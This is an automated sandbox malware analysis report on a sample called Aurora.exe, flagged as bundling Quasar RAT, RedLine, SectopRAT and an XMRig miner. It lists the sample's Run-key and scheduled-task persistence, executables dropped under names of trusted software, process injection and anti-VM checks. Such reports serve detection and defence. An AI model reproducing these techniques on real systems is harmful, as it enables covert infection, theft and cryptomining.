Malware Analysis Report

2024-09-11 09:52

Sample ID 240726-x1fw3sselb
Target Aurora.exe
SHA256 72e1fc6da0a5cfca80413b8b24a880b0688908264971cfedaf079ee52ce4d850
Tags
themida quasar redline sectoprat xmrig cheat themdas discovery evasion execution infostealer miner persistence rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

72e1fc6da0a5cfca80413b8b24a880b0688908264971cfedaf079ee52ce4d850

Threat Level: Known bad

The file Aurora.exe was found to be: Known bad.

Malicious Activity Summary

themida quasar redline sectoprat xmrig cheat themdas discovery evasion execution infostealer miner persistence rat spyware trojan

xmrig

SectopRAT payload

RedLine

Quasar RAT

Quasar payload

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine payload

SectopRAT

XMRig Miner payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Sets file to hidden

Checks BIOS information in registry

Checks computer location settings

Loads dropped DLL

Modifies file permissions

Themida packer

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Power Settings

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Views/modifies file attributes

Runs ping.exe

Suspicious use of SendNotifyMessage

MITRE ATT&CK Matrix

N/A

Analysis: static1

Detonation Overview

Reported

2024-07-26 19:19

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-26 19:18

Reported

2024-07-26 19:21

Platform

win7-20240708-en

Max time kernel

150s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2580 created 1204 N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe C:\Windows\Explorer.EXE
PID 2580 created 1204 N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe C:\Windows\Explorer.EXE
PID 2580 created 1204 N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe C:\Windows\Explorer.EXE
PID 316 created 1204 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\Explorer.EXE
PID 316 created 1204 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\Explorer.EXE
PID 316 created 1204 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\Explorer.EXE
PID 316 created 1204 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\Explorer.EXE

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge = "C:\\Users\\Admin\\AppData\\Local\\Msedge.exe" C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\OneDriveUpdate\\OneDrive Updater.exe" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\powercfg.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2780 set thread context of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 316 set thread context of 276 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\System32\conhost.exe
PID 316 set thread context of 1348 N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe C:\Windows\System32\svchost.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Google\Chrome\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3052 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe
PID 3052 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe
PID 3052 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe
PID 3052 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe
PID 3052 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 3052 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 3052 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 3052 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\Microsoft Edge\build.exe
PID 2916 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe C:\Windows\system32\cmd.exe
PID 2916 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe C:\Windows\system32\cmd.exe
PID 2916 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Roaming\AdobeLicense\AdobeUpdate.exe C:\Windows\system32\cmd.exe
PID 3052 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 3052 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 3052 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 3052 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
PID 2584 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2584 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2584 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 2604 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 2604 wrote to memory of 2624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 3052 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe
PID 3052 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe
PID 3052 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe
PID 3052 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\Aurora.exe C:\Users\Admin\AppData\Roaming\VLC Media Player\vlc.exe
PID 2604 wrote to memory of 772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2604 wrote to memory of 772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2604 wrote to memory of 772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2604 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2604 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2604 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2604 wrote to memory of 652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 652 wrote to memory of 584 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Msedge.exe
PID 652 wrote to memory of 584 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Msedge.exe
PID 652 wrote to memory of 584 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Msedge.exe
PID 2780 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2780 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\SysWOW64\cmd.exe
PID 2588 wrote to memory of 2176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2588 wrote to memory of 2176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2588 wrote to memory of 2176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2588 wrote to memory of 2176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2780 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\OneDrive Update Tool\OneDrive.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
